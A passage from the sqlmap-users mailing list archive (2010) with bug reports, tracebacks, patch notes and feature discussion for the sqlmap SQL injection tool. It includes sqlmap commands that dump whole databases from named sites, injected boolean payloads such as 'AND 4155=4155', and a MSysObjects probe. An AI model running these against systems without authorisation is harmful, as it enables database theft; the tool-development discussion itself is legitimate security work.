DOM L2 & L3. > Spend less time writing and rewriting code and more time creating great > experiences on the web. Be a part of the beta today > http://p.sf.net/sfu/msIE9-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Jair S. C. <esa...@se...> - 2010-11-19 21:14:14
|
Hi there.
The coomand used, is:
sqlmap# ./sqlmap.py --dump-all -g "site:congreso.seguridad.unam.mx"
and the output:
sqlmap version: 0.9-dev
Python version: 2.6.2
Operating system: posix
Traceback (most recent call last):
File "./sqlmap.py", line 82, in main
start()
File "/usr/bin/samurai/sqlmap/lib/controller/controller.py", line
226, in start
injType = checkSqlInjection(place, parameter, value, parenthesis)
File "/usr/bin/samurai/sqlmap/lib/controller/checks.py", line 75, in
checkSqlInjection
trueResult = Request.queryPage(payload, place)
File "/usr/bin/samurai/sqlmap/lib/request/connect.py", line 338, in
queryPage
page, headers = Connect.getPage(url=uri, get=get, post=post,
cookie=cookie, ua=ua, silent=silent, method=method,
auxHeaders=auxHeaders, response=response, raise404=raise404)
File "/usr/bin/samurai/sqlmap/lib/request/connect.py", line 164, in
getPage
conn = urllib2.urlopen(req)
File "/usr/lib/python2.6/urllib2.py", line 124, in urlopen
return _opener.open(url, data, timeout)
File "/usr/lib/python2.6/urllib2.py", line 375, in open
protocol = req.get_type()
File "/usr/lib/python2.6/urllib2.py", line 241, in get_type
raise ValueError, "unknown url type: %s" % self.__original
ValueError: unknown url type:
default?appex=Zamboni&idioma=es&nomex=Diego%20AND%204155=4155
I wished could be helpful. Bye.
--
*Edgar Jair Sandoval C.*
*D*epartamento de *A*uditoría y *N*uevas *T*ecnologías
*S*ubdirección de *S*eguridad de la *I*nformación / *UNAM-CERT*
Correo: esandoval AT seguridad DOT unam DOT mx
Teléfono: 56 22 81 69
|
|
From: Miroslav S. <mir...@gm...> - 2010-11-17 15:34:50
|
hi. i'll join Bernardo and say that --predict-output should do the same job. nevertheless will research your code and report. kr On Wed, Nov 17, 2010 at 4:14 PM, Bernardo Damele A. G. <ber...@gm...> wrote: > You spoiled one of the shiny features of sqlmap 0.9-dev that we will > be talking about during the next weeks ;) > It has been implemented about since 5 months or so, give it a try > yourself with --predict-output and enjoy. > > Bernardo > > > On 17 November 2010 14:57, Carlos Gabriel Vergara > <car...@gm...> wrote: >> Hi to all. >> >> Before all, i want to mention that i been working with the repository >> version of sqlmap (0.9) and it's awsome. >> >> I want to propose something crazy: Markov chains. >> (http://en.wikipedia.org/wiki/Markov_chain) >> Keeping it simple: a Markov chain is a tool that works on predictive >> events. It works with events, generating a "chain" (a list) of wich >> event is going to happen if certain events has already happen. >> When using sqlmap, let's say, when enumerating users, if at the middle >> of the process we see that the user is "roo", it's obvious that the >> last char will be a "t". If a table name is "aucti", the rest will be >> "on". If we see the "events" of the Markov chain as the probability of >> find one char knowing the predecessor chars, it could be used in >> sqlmap, at least to "try" the more often char for the previous >> combination, based on a dictionary of words (common users, tables, >> structures, values, etc). >> Another capability of Markov chain is that it has "memory"; in case of >> char prediction, the memory specifies how much chars it will be >> "looking back" when predicting the next. >> >> I have code a sample in python that shows the process in a very fool >> example. It's a tool that takes a dictionary as input, a "memory size" >> (default 2 chars back), and generates a random text based on this >> chain. The result will be random text similar to the language used in >> the dictionary. >> >> In sqlmap, the chain could be used to test the next "more probably" >> character for the partially guessed string based on a dictionary of >> common words. >> >> For example: the script was used on a dict file generated using >> "sqlmap --help > testdict.txt", with this output: >> >> $ ./markov_chain.py -d testdict.txt -m 4 >> sqlmap/0.8 - authe cookie header --ver takeover own SQL injection >> INI file click processions can behaviour or stack-end DBMS database >> gentry key value=RFILE -c CONFIGFILE Write DBMS current >> Last from retrinter(s) ratingerpreteration cert=ACERT First or >> structure affection (defaults (default 1) >> >> Look that "randomly" generated text using the chain is very very >> similar to the english speaking. >> >> I'm attaching the source to the mail. >> >> Hope it can help! >> >> Best regards, >> >> >> -- >> --------8<-------- >> Carlos Gabriel Vergara >> http://www.ThorSecurity.com.ar >> >> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp >> -------->8-------- >> >> ------------------------------------------------------------------------------ >> Beautiful is writing same markup. Internet Explorer 9 supports >> standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3. >> Spend less time writing and rewriting code and more time creating great >> experiences on the web. Be a part of the beta today >> http://p.sf.net/sfu/msIE9-sfdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > > ------------------------------------------------------------------------------ > Beautiful is writing same markup. Internet Explorer 9 supports > standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3. > Spend less time writing and rewriting code and more time creating great > experiences on the web. Be a part of the beta today > http://p.sf.net/sfu/msIE9-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-11-17 15:14:09
|
You spoiled one of the shiny features of sqlmap 0.9-dev that we will be talking about during the next weeks ;) It has been implemented about since 5 months or so, give it a try yourself with --predict-output and enjoy. Bernardo On 17 November 2010 14:57, Carlos Gabriel Vergara <car...@gm...> wrote: > Hi to all. > > Before all, i want to mention that i been working with the repository > version of sqlmap (0.9) and it's awsome. > > I want to propose something crazy: Markov chains. > (http://en.wikipedia.org/wiki/Markov_chain) > Keeping it simple: a Markov chain is a tool that works on predictive > events. It works with events, generating a "chain" (a list) of wich > event is going to happen if certain events has already happen. > When using sqlmap, let's say, when enumerating users, if at the middle > of the process we see that the user is "roo", it's obvious that the > last char will be a "t". If a table name is "aucti", the rest will be > "on". If we see the "events" of the Markov chain as the probability of > find one char knowing the predecessor chars, it could be used in > sqlmap, at least to "try" the more often char for the previous > combination, based on a dictionary of words (common users, tables, > structures, values, etc). > Another capability of Markov chain is that it has "memory"; in case of > char prediction, the memory specifies how much chars it will be > "looking back" when predicting the next. > > I have code a sample in python that shows the process in a very fool > example. It's a tool that takes a dictionary as input, a "memory size" > (default 2 chars back), and generates a random text based on this > chain. The result will be random text similar to the language used in > the dictionary. > > In sqlmap, the chain could be used to test the next "more probably" > character for the partially guessed string based on a dictionary of > common words. > > For example: the script was used on a dict file generated using > "sqlmap --help > testdict.txt", with this output: > > $ ./markov_chain.py -d testdict.txt -m 4 > sqlmap/0.8 - authe cookie header --ver takeover own SQL injection > INI file click processions can behaviour or stack-end DBMS database > gentry key value=RFILE -c CONFIGFILE Write DBMS current > Last from retrinter(s) ratingerpreteration cert=ACERT First or > structure affection (defaults (default 1) > > Look that "randomly" generated text using the chain is very very > similar to the english speaking. > > I'm attaching the source to the mail. > > Hope it can help! > > Best regards, > > > -- > --------8<-------- > Carlos Gabriel Vergara > http://www.ThorSecurity.com.ar > > PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp > -------->8-------- > > ------------------------------------------------------------------------------ > Beautiful is writing same markup. Internet Explorer 9 supports > standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3. > Spend less time writing and rewriting code and more time creating great > experiences on the web. Be a part of the beta today > http://p.sf.net/sfu/msIE9-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Carlos G. V. <car...@gm...> - 2010-11-17 14:57:37
|
Hi to all. Before all, i want to mention that i been working with the repository version of sqlmap (0.9) and it's awsome. I want to propose something crazy: Markov chains. (http://en.wikipedia.org/wiki/Markov_chain) Keeping it simple: a Markov chain is a tool that works on predictive events. It works with events, generating a "chain" (a list) of wich event is going to happen if certain events has already happen. When using sqlmap, let's say, when enumerating users, if at the middle of the process we see that the user is "roo", it's obvious that the last char will be a "t". If a table name is "aucti", the rest will be "on". If we see the "events" of the Markov chain as the probability of find one char knowing the predecessor chars, it could be used in sqlmap, at least to "try" the more often char for the previous combination, based on a dictionary of words (common users, tables, structures, values, etc). Another capability of Markov chain is that it has "memory"; in case of char prediction, the memory specifies how much chars it will be "looking back" when predicting the next. I have code a sample in python that shows the process in a very fool example. It's a tool that takes a dictionary as input, a "memory size" (default 2 chars back), and generates a random text based on this chain. The result will be random text similar to the language used in the dictionary. In sqlmap, the chain could be used to test the next "more probably" character for the partially guessed string based on a dictionary of common words. For example: the script was used on a dict file generated using "sqlmap --help > testdict.txt", with this output: $ ./markov_chain.py -d testdict.txt -m 4 sqlmap/0.8 - authe cookie header --ver takeover own SQL injection INI file click processions can behaviour or stack-end DBMS database gentry key value=RFILE -c CONFIGFILE Write DBMS current Last from retrinter(s) ratingerpreteration cert=ACERT First or structure affection (defaults (default 1) Look that "randomly" generated text using the chain is very very similar to the english speaking. I'm attaching the source to the mail. Hope it can help! Best regards, -- --------8<-------- Carlos Gabriel Vergara http://www.ThorSecurity.com.ar PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp -------->8-------- |
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-11-17 10:09:09
|
Hi, sqlmap is nearly 4 years and a half old.. older than my daughters ;) In the last 12 months a lot has been going on under the hood. Miroslav and I have been working hard trying to fix as many bugs reported as possible, getting back to You as promptly as possible and scheduling the development of new shiny features, some of them proposed by You. First and foremost, I would like to sincerely thank Miroslav for all of the amazing effort that he has put into the project as well as users' support. He joined me about a year ago. Since then he has demonstrated high professionalism, brilliant design and analytical capabilities and strong development skills driven by his outstanding motivation. Thank you! In my 'state of art - 3 years later' email[1] I highlighted the main goals achieved during 2009 and my plans for the next release. What's the state now, a year later? * The post-exploitation features have been stabilized, slightly improved and bug-fixed. * I can still confirm that we keep receiving a lot of great feedback from You, thank you! Your bug reports, feature requests and dumb questions too keep sqlmap community alive and drive our motivation even further. * The media attention to the tool is approximately vanished, as I have not presented at big name Conferences this year. * I don't think the tool is still the most downloaded tool in the category, might be, but sourceforge now allows to see only the weekly downloads of tools from the search page. However, who really cares. * The detection and comparison engine has been bug fixed, partially rewritten and highly improved by Miroslav - I told you, he is awesome! * My call for developers is still open, quality assurance and beta testers are needed too. Some native English speaking would be of help to improve the user's manual too. What have we achieved during 2010? The ones that regularly update from the Subversion repository, read the ChangeLog file or asked us directly, already know about some of the new features, but we would like to take the time to better introduce, explain and demonstrate them in a series of posts to the mailing list that will follow in the upcoming weeks. We hope that this will clarify design decisions that we have made, make you smile seeing your feature requests implemented and have a strong understanding on how to use the tool efficiently. These will all be part of the next release: 0.9, scheduled for early 2011. Stay tuned! [1] http://sourceforge.net/mailarchive/forum.php?thread_name=ffa432520912150559x7da484d0q5a580512abf4592f%40mail.gmail.com&forum_name=sqlmap-users Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Miroslav S. <mir...@gm...> - 2010-11-17 09:57:57
|
hi. it appears that that page uses invalid charset 'null' probably because of some internal problem. (probable) 'patch' can be found in the latest commit - null charset is now just ignored. "> the site is in English and Chinese. Could it be the Chinese part of the site the problem??" well, more probably there is something wrong with the dynamic engine of the site, than the language itself. kind regards. On Wed, Nov 17, 2010 at 10:46 AM, <nig...@em...> wrote: > Hi, > > my sqlmap has a new one > > [10:39:40] [WARNING] unknown charset 'null'. Please report by e-mail to sql...@li.... > > the site is in English and Chinese. Could it be the Chinese part of the site the problem?? > > greetz > > > > > > > > ------------------------------------------------------------------------------ > Beautiful is writing same markup. Internet Explorer 9 supports > standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3. > Spend less time writing and rewriting code and more time creating great > experiences on the web. Be a part of the beta today > http://p.sf.net/sfu/msIE9-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: <nig...@em...> - 2010-11-17 09:46:26
|
Hi, my sqlmap has a new one [10:39:40] [WARNING] unknown charset 'null'. Please report by e-mail to sql...@li.... the site is in English and Chinese. Could it be the Chinese part of the site the problem?? greetz |
|
From: Miroslav S. <mir...@gm...> - 2010-11-15 15:10:34
|
hi. plz update to the latest revision because there was a problem with false "page is too dynamic". probably in most of "dynamic" content pages sqlmap would quit without properly trying to remove the dynamicity inside. kind regards. -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-11-12 22:56:23
|
hi nightman. thank you for your report. plz update to have it patched. kr On Fri, Nov 12, 2010 at 6:59 PM, <nig...@em...> wrote: > C:\pentest\sqlmap.0.9>sqlmap -u "http://www.site.com/dvds.php?dvdId=4&isOn=1" --auth-type=basic --auth-cred=user:pass -f -b > > [18:50:12] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio > n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi > ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: nt > Traceback (most recent call last): > File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main > start() > File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 261, in start > injType = checkSqlInjection(place, parameter, value, parenthesis) > File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 94, in checkSqlInjection > falseResult = Request.queryPage(payload, place) > File "C:\pentest\sqlmap.0.9\lib\request\connect.py", line 383, in queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, silent=silent, method=method, auxHeaders=au > xHeaders, response=response, raise404=raise404) > File "C:\pentest\sqlmap.0.9\lib\request\connect.py", line 218, in getPage > page = conn.read() > File "C:\Python26\lib\socket.py", line 329, in read > data = self._sock.recv(rbufsize) > File "C:\Python26\lib\httplib.py", line 518, in read > return self._read_chunked(amt) > File "C:\Python26\lib\httplib.py", line 561, in _read_chunked > raise IncompleteRead(''.join(value)) > IncompleteRead: IncompleteRead(1284 bytes read) > > [*] shutting down at: 18:50:12 > > ------------------------------------------------------------------------------ > Centralized Desktop Delivery: Dell and VMware Reference Architecture > Simplifying enterprise desktop deployment and management using > Dell EqualLogic storage and VMware View: A highly scalable, end-to-end > client virtualization framework. Read more! > http://p.sf.net/sfu/dell-eql-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: <nig...@em...> - 2010-11-12 17:59:20
|
C:\pentest\sqlmap.0.9>sqlmap -u "http://www.site.com/dvds.php?dvdId=4&isOn=1" --auth-type=basic --auth-cred=user:pass -f -b [18:50:12] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.5 Operating system: nt Traceback (most recent call last): File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main start() File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 261, in start injType = checkSqlInjection(place, parameter, value, parenthesis) File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 94, in checkSqlInjection falseResult = Request.queryPage(payload, place) File "C:\pentest\sqlmap.0.9\lib\request\connect.py", line 383, in queryPage page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, silent=silent, method=method, auxHeaders=au xHeaders, response=response, raise404=raise404) File "C:\pentest\sqlmap.0.9\lib\request\connect.py", line 218, in getPage page = conn.read() File "C:\Python26\lib\socket.py", line 329, in read data = self._sock.recv(rbufsize) File "C:\Python26\lib\httplib.py", line 518, in read return self._read_chunked(amt) File "C:\Python26\lib\httplib.py", line 561, in _read_chunked raise IncompleteRead(''.join(value)) IncompleteRead: IncompleteRead(1284 bytes read) [*] shutting down at: 18:50:12 |
|
From: Miroslav S. <mir...@gm...> - 2010-11-11 17:12:29
|
hi. now you can use --columns (same effect as with --common-columns) with ms access too. it will use --common-columns switch which does a brute force check for existence of common columns in a given table (-T). this also applies to MySQL without schema. kr p.s. dumping of tables is next on a list ;). i only hope that there won't be any big issues. On Tue, Nov 9, 2010 at 3:57 PM, Miroslav Stampar <mir...@gm...> wrote: > just a quick report. i've collected "common columns" couple of days > ago (./txt/common-columns.txt) so "brute force get column names" will > be available in a few. > > kr > > On Tue, Nov 9, 2010 at 3:06 PM, Carlos Gabriel Vergara > <car...@gm...> wrote: >> "The law of the default" >> >> If you must explicity set the permissions, then will be difficult to >> find this kind of info. But if we are lucky and found a >> "lazy-non-standard" programming, this could be a nice security breach. >> >> I will read a little further... if something is found, will share it. >> >> Best regards, >> >> >> 2010/11/5 Miroslav Stampar <mir...@gm...>: >>> well, >>> >>> SELECT Name FROM MSysObjects WHERE Type = 1 >>> >>> (we already have it in ./xml/queries.xml) >>> >>> should basically get you this kind of information, but as I've >>> understood querying it from outside the MS Access environment (web >>> browser, ODBC connection) should result in: >>> >>> .....id=1 AND EXISTS(SELECT * FROM MSysObjects) >>> >>> Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC >>> Microsoft Access Driver] Record(s) cannot be read; no read permission >>> on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line >>> 33 >>> SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot >>> be read; no read permission on 'MSysObjects'. >>> >>> i haven't tested this against ASP environment, though. >>> >>> On Fri, Nov 5, 2010 at 7:17 PM, Carlos Gabriel Vergara >>> <car...@gm...> wrote: >>>> I was working with access some time ago, and now that you mention, i >>>> was working on getting metadata for the db. As far as i know, there >>>> are some "system tables", equivalent to sysobjects (mssql) or >>>> information_schema (mysql). Take a look at this article: >>>> >>>> http://www.datanumen.com/aar/articles/system-object.htm >>>> >>>> If i can find my test scripts, i will attach some to the list. >>>> >>>> Best regards, >>>> >>>> >>>> 2010/11/4 Miroslav Stampar <mir...@gm...>: >>>>> hi Ulises. >>>>> >>>>> i am glad to see that someone has started using sqlmap against Access >>>>> databases :) >>>>> >>>>> we've done necessary patches to prevent sqlmap crash in this kind of >>>>> situations, but still, we don't have implemented dumping of tables for >>>>> MS Access (due to non existent way for column enumeration - if someone >>>>> has some idea non-brute force related, please say and we'll try to >>>>> implement it). also, support for this DBMS is still in (early) >>>>> development phase and we hope that we'll finish it in some reasonable >>>>> time. >>>>> >>>>> kr >>>>> >>>>> On Thu, Nov 4, 2010 at 8:05 PM, Ulises2k <uli...@gm...> wrote: >>>>>> >>>>>> [15:30:49] [INFO] using '/root/sqlmap-dev/output/xxxx/session' as session >>>>>> file >>>>>> [15:30:49] [INFO] resuming injection point 'GET' from session file >>>>>> [15:30:49] [INFO] resuming injection parameter 'Id' from session file >>>>>> [15:30:49] [INFO] resuming injection type 'numeric' from session file >>>>>> [15:30:49] [INFO] resuming match ratio '0.9' from session file >>>>>> [15:30:49] [INFO] resuming 0 number of parenthesis from session file >>>>>> [15:30:49] [INFO] resuming back-end DBMS 'microsoft access' from session >>>>>> file >>>>>> [15:30:49] [INFO] testing connection to the target url >>>>>> [15:30:50] [INFO] testing for parenthesis on injectable parameter >>>>>> [15:30:50] [INFO] the back-end DBMS is Microsoft Access >>>>>> web server operating system: Windows 2008 >>>>>> web application technology: ASP.NET, Microsoft IIS 7.5, ASP >>>>>> back-end DBMS: Microsoft Access >>>>>> [15:30:50] [ERROR] cannot retrieve table names, back-end DBMS is Access >>>>>> do you want to use common table existance check? [Y/n/q]Y >>>>>> [15:30:52] [INFO] checking tables existence using items from >>>>>> '/root/sqlmap-dev/txt/common-tables.txt' >>>>>> [15:32:06] [INFO] retrieved: >>>>>> notas >>>>>> [15:57:55] [INFO] tried: 1780/1780 items (100%) >>>>>> >>>>>> [15:57:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >>>>>> with the latest development version from the Subversion repository. If the >>>>>> exception persists, please send by e-mail to >>>>>> sql...@li... the command line, the following text and >>>>>> any information needed to reproduce the bug. The developers will try to >>>>>> reproduce the bug, fix it accordingly and get back to you. >>>>>> sqlmap version: 0.9-dev (r2265) >>>>>> Python version: 2.5.2 >>>>>> Operating system: posix >>>>>> Traceback (most recent call last): >>>>>> File "./sqlmap.py", line 79, in main >>>>>> start() >>>>>> File "/root/sqlmap-dev/lib/controller/controller.py", line 298, in start >>>>>> action() >>>>>> File "/root/sqlmap-dev/lib/controller/action.py", line 117, in action >>>>>> conf.dbmsHandler.dumpAll() >>>>>> File "/root/sqlmap-dev/plugins/generic/enumeration.py", line 1263, in >>>>>> dumpAll >>>>>> for db, tables in kb.data.cachedTables.items(): >>>>>> AttributeError: 'list' object has no attribute 'items' >>>>>> >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >>>>>> David G. Thomson, author of the best-selling book "Blueprint to a >>>>>> Billion" shares his insights and actions to help propel your >>>>>> business during the next growth cycle. Listen Now! >>>>>> http://p.sf.net/sfu/SAP-dev2dev >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sql...@li... >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> >>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com >>>>> Mobile: +385921010204 (HR 0921010204) >>>>> PGP Key ID: 0xB5397B1B >>>>> Location: Zagreb, Croatia >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >>>>> David G. Thomson, author of the best-selling book "Blueprint to a >>>>> Billion" shares his insights and actions to help propel your >>>>> business during the next growth cycle. Listen Now! >>>>> http://p.sf.net/sfu/SAP-dev2dev >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>> >>>> >>>> >>>> -- >>>> --------8<-------- >>>> Carlos Gabriel Vergara >>>> http://www.ThorSecurity.com.ar >>>> >>>> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp >>>> -------->8-------- >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> >>> E-mail / Jabber: miroslav.stampar (at) gmail.com >>> Mobile: +385921010204 (HR 0921010204) >>> PGP Key ID: 0xB5397B1B >>> Location: Zagreb, Croatia >>> >> >> >> >> -- >> --------8<-------- >> Carlos Gabriel Vergara >> http://www.ThorSecurity.com.ar >> >> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp >> -------->8-------- >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-11-09 14:57:09
|
just a quick report. i've collected "common columns" couple of days ago (./txt/common-columns.txt) so "brute force get column names" will be available in a few. kr On Tue, Nov 9, 2010 at 3:06 PM, Carlos Gabriel Vergara <car...@gm...> wrote: > "The law of the default" > > If you must explicity set the permissions, then will be difficult to > find this kind of info. But if we are lucky and found a > "lazy-non-standard" programming, this could be a nice security breach. > > I will read a little further... if something is found, will share it. > > Best regards, > > > 2010/11/5 Miroslav Stampar <mir...@gm...>: >> well, >> >> SELECT Name FROM MSysObjects WHERE Type = 1 >> >> (we already have it in ./xml/queries.xml) >> >> should basically get you this kind of information, but as I've >> understood querying it from outside the MS Access environment (web >> browser, ODBC connection) should result in: >> >> .....id=1 AND EXISTS(SELECT * FROM MSysObjects) >> >> Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC >> Microsoft Access Driver] Record(s) cannot be read; no read permission >> on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line >> 33 >> SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot >> be read; no read permission on 'MSysObjects'. >> >> i haven't tested this against ASP environment, though. >> >> On Fri, Nov 5, 2010 at 7:17 PM, Carlos Gabriel Vergara >> <car...@gm...> wrote: >>> I was working with access some time ago, and now that you mention, i >>> was working on getting metadata for the db. As far as i know, there >>> are some "system tables", equivalent to sysobjects (mssql) or >>> information_schema (mysql). Take a look at this article: >>> >>> http://www.datanumen.com/aar/articles/system-object.htm >>> >>> If i can find my test scripts, i will attach some to the list. >>> >>> Best regards, >>> >>> >>> 2010/11/4 Miroslav Stampar <mir...@gm...>: >>>> hi Ulises. >>>> >>>> i am glad to see that someone has started using sqlmap against Access >>>> databases :) >>>> >>>> we've done necessary patches to prevent sqlmap crash in this kind of >>>> situations, but still, we don't have implemented dumping of tables for >>>> MS Access (due to non existent way for column enumeration - if someone >>>> has some idea non-brute force related, please say and we'll try to >>>> implement it). also, support for this DBMS is still in (early) >>>> development phase and we hope that we'll finish it in some reasonable >>>> time. >>>> >>>> kr >>>> >>>> On Thu, Nov 4, 2010 at 8:05 PM, Ulises2k <uli...@gm...> wrote: >>>>> >>>>> [15:30:49] [INFO] using '/root/sqlmap-dev/output/xxxx/session' as session >>>>> file >>>>> [15:30:49] [INFO] resuming injection point 'GET' from session file >>>>> [15:30:49] [INFO] resuming injection parameter 'Id' from session file >>>>> [15:30:49] [INFO] resuming injection type 'numeric' from session file >>>>> [15:30:49] [INFO] resuming match ratio '0.9' from session file >>>>> [15:30:49] [INFO] resuming 0 number of parenthesis from session file >>>>> [15:30:49] [INFO] resuming back-end DBMS 'microsoft access' from session >>>>> file >>>>> [15:30:49] [INFO] testing connection to the target url >>>>> [15:30:50] [INFO] testing for parenthesis on injectable parameter >>>>> [15:30:50] [INFO] the back-end DBMS is Microsoft Access >>>>> web server operating system: Windows 2008 >>>>> web application technology: ASP.NET, Microsoft IIS 7.5, ASP >>>>> back-end DBMS: Microsoft Access >>>>> [15:30:50] [ERROR] cannot retrieve table names, back-end DBMS is Access >>>>> do you want to use common table existance check? [Y/n/q]Y >>>>> [15:30:52] [INFO] checking tables existence using items from >>>>> '/root/sqlmap-dev/txt/common-tables.txt' >>>>> [15:32:06] [INFO] retrieved: >>>>> notas >>>>> [15:57:55] [INFO] tried: 1780/1780 items (100%) >>>>> >>>>> [15:57:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >>>>> with the latest development version from the Subversion repository. If the >>>>> exception persists, please send by e-mail to >>>>> sql...@li... the command line, the following text and >>>>> any information needed to reproduce the bug. The developers will try to >>>>> reproduce the bug, fix it accordingly and get back to you. >>>>> sqlmap version: 0.9-dev (r2265) >>>>> Python version: 2.5.2 >>>>> Operating system: posix >>>>> Traceback (most recent call last): >>>>> File "./sqlmap.py", line 79, in main >>>>> start() >>>>> File "/root/sqlmap-dev/lib/controller/controller.py", line 298, in start >>>>> action() >>>>> File "/root/sqlmap-dev/lib/controller/action.py", line 117, in action >>>>> conf.dbmsHandler.dumpAll() >>>>> File "/root/sqlmap-dev/plugins/generic/enumeration.py", line 1263, in >>>>> dumpAll >>>>> for db, tables in kb.data.cachedTables.items(): >>>>> AttributeError: 'list' object has no attribute 'items' >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >>>>> David G. Thomson, author of the best-selling book "Blueprint to a >>>>> Billion" shares his insights and actions to help propel your >>>>> business during the next growth cycle. Listen Now! >>>>> http://p.sf.net/sfu/SAP-dev2dev >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>>> >>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> >>>> E-mail / Jabber: miroslav.stampar (at) gmail.com >>>> Mobile: +385921010204 (HR 0921010204) >>>> PGP Key ID: 0xB5397B1B >>>> Location: Zagreb, Croatia >>>> >>>> ------------------------------------------------------------------------------ >>>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >>>> David G. Thomson, author of the best-selling book "Blueprint to a >>>> Billion" shares his insights and actions to help propel your >>>> business during the next growth cycle. Listen Now! >>>> http://p.sf.net/sfu/SAP-dev2dev >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>> >>> >>> >>> -- >>> --------8<-------- >>> Carlos Gabriel Vergara >>> http://www.ThorSecurity.com.ar >>> >>> PGP: 